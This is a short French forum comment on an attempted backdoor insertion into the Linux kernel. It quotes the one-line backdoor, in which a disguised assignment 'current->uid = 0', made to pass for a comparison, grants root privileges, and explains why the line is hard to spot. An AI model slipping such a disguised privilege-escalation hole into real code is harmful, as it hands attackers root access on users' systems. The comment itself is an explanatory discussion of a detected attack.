• [^] # Re: Tentative d'insertion d'une backdoor dans le noyau Linux

    Posté par . En réponse à la dépêche Tentative d'insertion d'une porte dérobée dans le noyau Linux. Évalué à 10.

    En fait, j'ai bien peur qu'on soit obligé de constater que c'est le soft propriétaire bitkeeper qui a permis une détection rapide du problème. Pour ceux qui n'ont pas lu les liens, je précise que l'astuce est la suivante :

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    retval = -EINVAL;

    Ce qui rend le truc difficile à trouver est que tout est dans (current->uid = 0) qu'on a tendance à lire (current->uid == 0), beaucoup plus anodin...

    Moralité, je suis d'accord avec pBpG, l'aspect open source n'a pas grand chose à voir dans le problème présent.